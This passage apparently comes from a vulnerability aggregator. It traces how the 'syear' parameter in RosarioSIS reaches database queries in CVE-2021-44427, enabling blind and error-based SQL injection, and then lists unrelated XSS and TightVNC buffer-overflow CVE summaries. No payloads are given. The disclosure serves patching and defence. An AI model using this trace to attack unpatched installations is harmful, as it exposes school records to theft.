Stepping into from _**line 411**_ of _**functions/GetMP.php**_ leads to the function definition of _**UserSyear()**_ located in _**line 27**_ of _**functions/Current.php**_ which shows that its returning the value initially assigned to the HTTP POST request parameter _**syear**_ which was assigned earlier.

![image](https://gitlab.com/uploads/147059e256bce26268dbec8302ff6af3/image.png)

From this point, the SQL query is executed through the _**DBQuery()**_ function which is defined in _**database.inc.php**_. The output can be observed at the postgresql log file (If logging is enabled). This can lead to a Time-based blind SQL Injection attack.

![image](https://gitlab.com/uploads/a0d15baaf3fc13b76acc1979b1d79f34/image.png)

![image](https://gitlab.com/uploads/acb8e24cc75233cd67c4fcb6b21bc53d/image.png)

It was also observed that the injected SQL query is being executed again on _**line 452**_ of _**Side.php**_ - The error message & injected SQL query is actually displayed from Side.php which can also lead to Error-based & Boolean-based blind SQL Injection attacks.

![image](https://gitlab.com/uploads/6f8f85f8b4f07037806dda772d315204/image.png)

![image](https://gitlab.com/uploads/12d41d3c6191f3a16cf1d52c03afd138/image.png)

CVE-2021-44427: Improper Access Control leading to Unauthenticated SQL Injection (#328) · Issues · François Jacquet / rosariosis

Cross-site scripting vulnerability in Booking Package - Appointment Booking Calendar System versions prior to 1.5.11 allows a remote attacker to inject an arbitrary script via unspecified vectors.

CVE-2021-20840: Booking Package – Appointment Booking Calendar System

Buffer Overflow vulnerability in tvnviewer.exe of TightVNC Viewer allows a remote attacker to execute arbitrary instructions via a crafted FramebufferUpdate packet from a VNC server.

Tag

#apple